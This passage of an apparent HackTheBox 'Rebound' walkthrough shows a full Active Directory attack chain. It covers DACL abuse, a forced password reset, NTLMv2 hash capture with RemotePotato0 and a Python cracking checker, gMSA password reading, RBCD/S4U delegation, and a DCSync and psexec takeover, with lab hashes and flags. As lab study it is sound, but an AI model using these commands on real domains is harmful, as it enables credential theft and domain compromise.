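SAMPLE_SD = build_sd([                                                           # constructed, not from the box
    build_ace(ACCESS_ALLOWED_ACE, GENERIC_ALL, DOMAIN_SID + "-512"),                         # Domain Admins
    build_ace(ACCESS_ALLOWED_OBJECT_ACE, ADS_RIGHT_DS_SELF, OOREND_SID, MEMBER_GUID),        # the ACE found above
    build_ace(ACCESS_ALLOWED_ACE, 0x00020094, "S-1-5-11"),                                   # Authenticated Users, read-only
])

if __name__ == "__main__":
    for trustee in (OOREND_SID, DOMAIN_SID + "-512", "S-1-5-11"):
        print(trustee, rights_for(SAMPLE_SD, trustee))
```

To run it against a real group, read nTSecurityDescriptor with the SD flags control restricted to the DACL (which is what dacledit.py and bloodyAD do) and pass the raw bytes to rights_for; the Self bit only matters when it is scoped to the member GUID or unscoped, which is why the check looks at the object type as well as the mask.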
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main export KRB5CCNAME=oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=service users,DC=REBOUND,dc=htb' 'rebound.htb/oorend' -use-ldaps -k -no-pass -dc-ip 10.10.11.231
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20231122-234007.bak
[*] DACL modified successfully!
With full control over the OU, I could then grant oorend the ResetPassword right on winrm_svc:
getTGT.py 'rebound.htb/oorend:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in oorend.ccache
lucas@parrot ~/machines/rebound/content/bloodyAD main dacledit.py -action 'write' -rights 'ResetPassword' -principal 'oorend' -target 'winrm_svc' -dc-ip dc01.rebound.htb -use-ldaps -k -no-pass 'rebound.htb/oorend'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] DACL backed up to dacledit-20231122-234109.bak
[*] DACL modified successfully!
With that right I set winrm_svc's password to whatever I wanted:
lucas@parrot ~/machines/rebound/content/bloodyAD main ./bloodyAD.py -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Solokami123#
[+] Password changed successfully!
After changing the password I connected as winrm_svc over WinRM and immediately sent a reverse shell back to my box, because the password was being reset periodically and I wanted a session that would survive that.
lucas@parrot ~/backup/evil-winrm master evil-winrm -i 10.10.11.231 -u 'winrm_svc' -p 'Solokami123#'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents>
That gave me user.txt:
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> type ..\desktop\user.txt
74eb0cf862c526d25a321da25b030d74
The privilege escalation path was clear but hard. I could see that the user tbrady can read the gMSA password of the machine account DELEGATOR$, and that DELEGATOR$ is allowed to delegate to DC01. DC01$ can DCSync the domain, so impersonating it would let me dump every hash in NTDS. There were two problems: first I had to find a way to reach tbrady, and then I had to make the delegation actually work. tbrady came first.
PS C:\ProgramData> copy \\10.10.14.15\smb\winPEAS.exe
PS C:\ProgramData> .\winPEAS.exe
I started enumerating the box with winPEAS to find a way to tbrady, but it died halfway through and I still had no specific path. Without a lead, I fell back on RemotePotato0: it abuses DCOM cross-session activation to make the session of another user logged on to the box authenticate to a rogue OXID resolver, so I could capture the NTLMv2 response of whoever else was logged in. That meant uploading RemotePotato0, forwarding port 135 on my host back to the rogue resolver on the target's port 9999 with socat (the DCOM client on the box is pointed at my IP and its OXID resolution bounces back to the target), and starting ntlmrelayx in case the authentication could be relayed:
lucas@parrot ~/machines/rebound sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
sudo ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc
PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.10.14.15 -x 10.10.14.15 -p 9999
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.10.14.15 to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:c67e86d5206fee69:8bec5d7e00ab42bdf9775aef77317d21:0101000000000000fdb2cc76ca1dda01c36b1d131dc676f30000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e0068007400620007000800fdb2cc76ca1dda01060004000600000008003000300000000000000001000000002000000e7ff7fe6b0991ab4a9b6620e70681ec0df8c1fdd30593dc0bb1841a890e6db30a00100000000000000000000000000000000000090000000000000000000000
Almost instantly I had tbrady's NTLMv2 hash. In mode 2 RemotePotato0 captures the hash itself on its internal RPC relay server (port 9997 in the output above), so the ntlmrelayx listener was not what produced it. I moved the hash to my Windows host, cracked it (NetNTLMv2, hashcat mode 5600) and got the credentials:
tbrady : 543BOMBOMBUNmanda
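For the cracking step, here is what a NetNTLMv2 line of the kind RemotePotato0 printed actually contains and how a candidate password is tested against it. This is an added example, not RemotePotato0 or hashcat code: it parses the user::domain:challenge:NTProofStr:blob format (hashcat mode 5600), recomputes NTProofStr = HMAC-MD5(NTOWFv2, challenge || blob) for a candidate and compares. MD4 is implemented inline because OpenSSL 3 builds of Python usually lack hashlib's md4. The SAMPLE_* values are constructed; CAPTURED_LINE is the line from the output above, joined back into one line.

```python
"""Parse a NetNTLMv2 capture line (hashcat -m 5600 format) and test candidate
passwords against it. Added example, not RemotePotato0 or hashcat code. MD4 is
implemented inline because OpenSSL 3 builds of Python often lack hashlib md4."""
import hashlib
import hmac
import struct

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the hash behind the NT hash (MD4 of the UTF-16LE password)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & M32
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):      # round 1
            a, b, c, d = d, rol((a + F(b, c, d) + X[i]) & M32, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):      # round 2
            a, b, c, d = d, rol((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):      # round 3
            a, b, c, d = d, rol((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain), both UTF-16LE; the domain keeps its case."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntproofstr(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || NTLMv2 client blob)."""
    return hmac.new(ntowf_v2(password, user, domain), challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> dict:
    """user::domain:server_challenge:ntproofstr:blob, the last three hex encoded."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def check_password(line: str, candidate: str) -> bool:
    """True if `candidate` reproduces the NTProofStr in the captured line."""
    h = parse_5600(line)
    return hmac.compare_digest(ntproofstr(candidate, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"])


def make_5600(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a capture line from known inputs (only needed for the constructed sample)."""
    return f"{user}::{domain}:{challenge.hex()}:{ntproofstr(password, user, domain, challenge, blob).hex()}:{blob.hex()}"


def av_pair(av_id: int, value: bytes) -> bytes:
    return struct.pack("<HH", av_id, len(value)) + value


# Constructed sample: fixed challenge and a minimal NTLMv2_CLIENT_CHALLENGE blob (not a real capture)
SAMPLE_CHALLENGE = bytes.fromhex("0011223344556677")
SAMPLE_BLOB = (bytes.fromhex("0101000000000000") + bytes.fromhex("00a0d7a2b1c8d901")   # RespType/HiRespType/reserved, timestamp
               + bytes.fromhex("8899aabbccddeeff") + b"\x00" * 4                        # client challenge, reserved
               + av_pair(0x0002, "rebound".encode("utf-16-le")) + av_pair(0x0001, "DC01".encode("utf-16-le"))
               + av_pair(0x0000, b"") + b"\x00" * 4)                                     # MsvAvEOL, padding
SAMPLE_LINE = make_5600("tbrady", "rebound", "543BOMBOMBUNmanda", SAMPLE_CHALLENGE, SAMPLE_BLOB)

# The line RemotePotato0 printed above, joined back into one line
CAPTURED_LINE = ("tbrady::rebound:c67e86d5206fee69:8bec5d7e00ab42bdf9775aef77317d21:0101000000000000fdb2cc76ca1d"
                 "da01c36b1d131dc676f30000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f00"
                 "75006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200"
                 "650062006f0075006e0064002e0068007400620007000800fdb2cc76ca1dda01060004000600000008003000300000000000000001000000"
                 "002000000e7ff7fe6b0991ab4a9b6620e70681ec0df8c1fdd30593dc0bb1841a890e6db30a00100000000000000000000000000000000000"
                 "090000000000000000000000")

if __name__ == "__main__":
    for cand in ("Password1", "543BOMBOMBUNmanda"):
        print(cand, check_password(SAMPLE_LINE, cand), check_password(CAPTURED_LINE, cand))
```

The blob is the client's NTLMv2_CLIENT_CHALLENGE, which is why it is part of the MAC input: the AV pairs inside it (domain, computer name, DNS names, timestamp) are what the DC signed over, and a relay cannot alter them without breaking NTProofStr. If the captured line above was transcribed intact, check_password(CAPTURED_LINE, "543BOMBOMBUNmanda") returns True.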
With those credentials I used RunasCs.exe (to run a command as tbrady from the winrm_svc shell) and GMSAPasswordReader.exe to read the hashes of the gMSA DELEGATOR$:
PS C:\ProgramData> .\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\ProgramData\GMSAPasswordReader.exe --accountname DELEGATOR$"
[*] Warning: The logon for user 'tbrady' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
Calculating hashes for Old Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : CD903918320095660FF2E12072F5551C
[*] aes128_cts_hmac_sha1 : FB5D91D42C9161EA97106DA01AAC440F
[*] aes256_cts_hmac_sha1 : 61064C12662B3CEB3D80D85498AA25641660B1B158D08D626B5E80FE6B88286E
[*] des_cbc_md5 : E040D0A1C2682A08
Calculating hashes for Current Value
[*] Input username : delegator$
[*] Input domain : REBOUND.HTB
[*] Salt : REBOUND.HTBdelegator$
[*] rc4_hmac : F8DB61F5FD0643C073CD58FFCC81379F
[*] aes128_cts_hmac_sha1 : 7B060E4BD433D7F9848EBFFF8995F11E
[*] aes256_cts_hmac_sha1 : 35215B71A30B208458FFB9F5705500DED5223DBF0F0FBFE77732BB8C9AF15FBA
[*] des_cbc_md5 : C4AEA2F7549D0D10
Another way to read it is CrackMapExec's --gmsa option over LDAP. Since LDAP authentication was giving me trouble, I first requested a ticket for tbrady and used it with CrackMapExec:
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb/tbrady:543BOMBOMBUNmanda' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in tbrady.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=tbrady.ccache
lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache --gmsa
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.231 636 DC01 [+] rebound.htb\tbrady from ccache
LDAP 10.10.11.231 636 DC01 [*] Getting GMSA Passwords
LDAP 10.10.11.231 636 DC01 Account: delegator$ NTLM: f8db61f5fd0643c073cd58ffcc81379f
With the NT hash I requested a TGT and authenticated as DELEGATOR$:
lucas@parrot ~/machines/rebound/exploit/root getTGT.py 'rebound.htb'/'delegator$' -dc-ip 10.10.11.231 -hashes :F8DB61F5FD0643C073CD58FFCC81379F
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in delegator$.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=delegator\$.ccache
lucas@parrot ~/machines/rebound/exploit/root cme ldap 10.10.11.231 -k --use-kcache
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.11.231 636 DC01 [+] rebound.htb\delegator$
Once that worked, I knew I could operate as that account and could start thinking about how to attack its delegation over DC01.
There are several kinds of delegation (unconstrained, constrained, and RBCD, resource-based constrained delegation), plus related tricks like the Bronze Bit attack. Here DELEGATOR$ is allowed to delegate to DC01, but not in a directly usable way: my main strategy was to run the S4U chain with Rubeus from inside the box as DELEGATOR$, and it always failed at the last step, when requesting the ticket to delegate to DC01. That is how constrained delegation behaves without protocol transition: S4U2Self from an account that is not trusted to authenticate for delegation returns a non-forwardable ticket, and the KDC refuses to use it in S4U2Proxy. Since I owned DELEGATOR$, though, I could hand that trust to another account: configure RBCD on DELEGATOR$ so that a user or machine account I control can obtain a forwardable ticket for DC01$ to DELEGATOR$'s own service, and then let DELEGATOR$ use that ticket to delegate to DC01. A bypass, basically, but one I could not figure out by myself.
The overall steps I found on HackTricks were: write msDS-AllowedToActOnBehalfOfOtherIdentity on DELEGATOR$ so that it trusts the user or machine account we choose, then chain that trust into a ticket as DC01$.
The BloodHound help for the delegation edge suggests this:
In the following example, victim is the attacker-controlled account (i.e. the hash is known) that is configured for constrained delegation. That is, victim has the "HTTP/PRIMARY.testlab.local" service principal name (SPN) set in its msds-AllowedToDelegateTo property. The command first requests a TGT for the victim user and executes the S4U2self/S4U2proxy process to impersonate the "admin" user to the "HTTP/PRIMARY.testlab.local" SPN. The alternative sname "cifs" is substituted in to the final service ticket. This grants the attacker the ability to access the file system of PRIMARY.testlab.local as the "admin" user.
The thing is, BloodHound is describing constrained delegation where S4U2Self/S4U2Proxy works directly from the configured account, which is exactly the step that failed here, so that did not help much.
There are, however, some resources on the internet that cover this more deeply; one of them had a graphic that explains it better.
So the first step was to read the attribute on the machine account DELEGATOR$, and for that I used Impacket's rbcd.py, which is designed for exactly this:
rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
Knowing it was empty, I could switch -action read to write and add -delegate-from with an account I controlled, in this case ldap_monitor, to put it in the attribute:
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action 'write' -k -no-pass -delegate-from 'ldap_monitor'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
Running the read again showed ldap_monitor in msDS-AllowedToActOnBehalfOfOtherIdentity:
lucas@parrot ~/machines/rebound/exploit/root rbcd.py 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -action read -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
At this point I could try the delegation through ldap_monitor. First I requested a TGT to work as that user:
getTGT.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -dc-ip 10.10.11.231
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in ldap_monitor.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=ldap_monitor.ccache
Then I requested a service ticket for DELEGATOR$'s own SPN, browser/dc01.rebound.htb, impersonating dc01$: S4U2Self as ldap_monitor followed by S4U2Proxy, which the RBCD entry allows:
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
With that ticket (a forwardable service ticket for dc01$ to DELEGATOR$) I could finish the delegation to DC01: I exported it and ran S4U2Proxy as DELEGATOR$ with it as the additional ticket, targeting http/dc01.rebound.htb:
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache
lucas@parrot ~/machines/rebound/exploit/root getST.py -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01\$.ccache" "rebound.htb/delegator$" -k -no-pass -hashes :F8DB61F5FD0643C073CD58FFCC81379F
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$.ccache
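To make the reasoning behind these three commands concrete, here is a toy model of the KDC's S4U decisions. It is an added illustration, not Impacket or Windows code, and deliberately reduces MS-SFU to four rules: S4U2Self needs an SPN on the requester and is forwardable only with protocol transition; classic constrained delegation (msDS-AllowedToDelegateTo) needs a forwardable evidence ticket; RBCD (msDS-AllowedToActOnBehalfOfOtherIdentity) accepts the evidence ticket without that flag; a ticket issued by S4U2Proxy is forwardable. Account names follow the writeup; the SPN on ldap_monitor is an assumption (S4U2Self requires one, and the successful getST above implies it). direct_attempt() replays the Rubeus attempt that failed, rbcd_chain() replays rbcd.py write plus the two getST calls.

```python
"""Toy model of the KDC rules behind the RBCD detour (MS-SFU 3.2.5.2). Added
illustration, not Impacket or Windows code; ldap_monitor's SPN is assumed."""
from dataclasses import dataclass, field


@dataclass
class Account:
    name: str
    spns: set = field(default_factory=set)
    allowed_to_delegate_to: set = field(default_factory=set)    # msDS-AllowedToDelegateTo (classic constrained)
    trusted_to_auth: bool = False                                  # TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition)
    allowed_to_act_on_behalf: set = field(default_factory=set)   # msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)
    sensitive: bool = False                                        # NOT_DELEGATED / Protected Users


@dataclass
class Ticket:
    client: str        # identity the ticket asserts
    service: str       # account whose key encrypts it
    spn: str
    forwardable: bool


class ToyKDC:
    def __init__(self, accounts):
        self.accounts = {a.name: a for a in accounts}

    def owner_of(self, spn):
        for acct in self.accounts.values():
            if spn in acct.spns:
                return acct
        raise KeyError("no account holds SPN " + spn)

    def s4u2self(self, requester, user):
        """A service asks for a ticket to itself for `user`. Any account with an SPN may;
        the ticket is forwardable only if the service has protocol transition."""
        svc = self.accounts[requester]
        if not svc.spns:
            raise PermissionError(f"{requester} has no SPN, S4U2Self refused")
        if self.accounts[user].sensitive:
            raise PermissionError(f"{user} cannot be delegated")
        return Ticket(user, requester, next(iter(svc.spns)), forwardable=svc.trusted_to_auth)

    def s4u2proxy(self, requester, evidence, target_spn):
        """Classic constrained delegation needs a forwardable evidence ticket;
        RBCD only needs the requester listed on the target, forwardable or not."""
        svc, target = self.accounts[requester], self.owner_of(target_spn)
        if evidence.service != requester:
            raise PermissionError("evidence ticket was not issued to the requesting service")
        if self.accounts[evidence.client].sensitive:
            raise PermissionError(f"{evidence.client} cannot be delegated")
        classic = target_spn in svc.allowed_to_delegate_to and evidence.forwardable
        rbcd = requester in target.allowed_to_act_on_behalf
        if not (classic or rbcd):
            raise PermissionError(f"{requester} may not delegate {evidence.client} to {target_spn}")
        return Ticket(evidence.client, target.name, target_spn, forwardable=True)   # S4U2Proxy output is forwardable


def rebound_kdc():
    return ToyKDC([
        Account("dc01$", spns={"http/dc01.rebound.htb", "ldap/dc01.rebound.htb"}),
        Account("delegator$", spns={"browser/dc01.rebound.htb"},
                allowed_to_delegate_to={"http/dc01.rebound.htb"}, trusted_to_auth=False),
        Account("ldap_monitor", spns={"ldapmon/dc01.rebound.htb"}),   # assumed SPN
    ])


def direct_attempt(kdc):
    """What Rubeus did from inside the box: S4U2Self then S4U2Proxy as delegator$."""
    evidence = kdc.s4u2self("delegator$", "dc01$")
    try:
        kdc.s4u2proxy("delegator$", evidence, "http/dc01.rebound.htb")
        return "succeeded"
    except PermissionError as err:
        return f"failed: {err}"


def rbcd_chain(kdc):
    """The three commands above: rbcd.py write, getST as ldap_monitor, getST as delegator$."""
    kdc.accounts["delegator$"].allowed_to_act_on_behalf.add("ldap_monitor")
    t1 = kdc.s4u2self("ldap_monitor", "dc01$")
    t2 = kdc.s4u2proxy("ldap_monitor", t1, "browser/dc01.rebound.htb")   # forwardable ticket for dc01$ to delegator$
    return kdc.s4u2proxy("delegator$", t2, "http/dc01.rebound.htb")      # the -additional-ticket step


if __name__ == "__main__":
    kdc = rebound_kdc()
    print("direct:", direct_attempt(kdc))
    print("chain: ", rbcd_chain(kdc))
```

The model also shows why the detour stops working when the impersonated account is marked sensitive or sits in Protected Users: both S4U2Self and S4U2Proxy refuse it, regardless of how the delegation is configured.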
Finally, holding a service ticket as DC01$, I had DCSync rights over the domain, so I could dump NTDS secrets with secretsdump:
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=dc01\$.ccache
lucas@parrot ~/machines/rebound/exploit/root secretsdump.py "rebound.htb"/'dc01$'@"dc01.rebound.htb" -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...
And finally, with the Administrator hash I could connect however I wanted and grab root.txt:
getTGT.py -dc-ip 10.10.11.231 rebound.htb/Administrator -hashes :176be138594933bb67db3b2572fc91b8
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Saving ticket in Administrator.ccache
lucas@parrot ~/machines/rebound/exploit/root export KRB5CCNAME=Administrator.ccache
lucas@parrot ~/machines/rebound/exploit/root psexec.py rebound.htb/Administrator@dc01.rebound.htb -k -no-pass
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on dc01.rebound.htb.....
[*] Found writable share ADMIN$
[*] Uploading file RupWsVcI.exe
[*] Opening SVCManager on dc01.rebound.htb.....
[*] Creating service DiJP on dc01.rebound.htb.....
[*] Starting service DiJP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4720]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type \users\administrator\desktop\root.txt
0aebf6d9000396cb05378e622c9cd7ca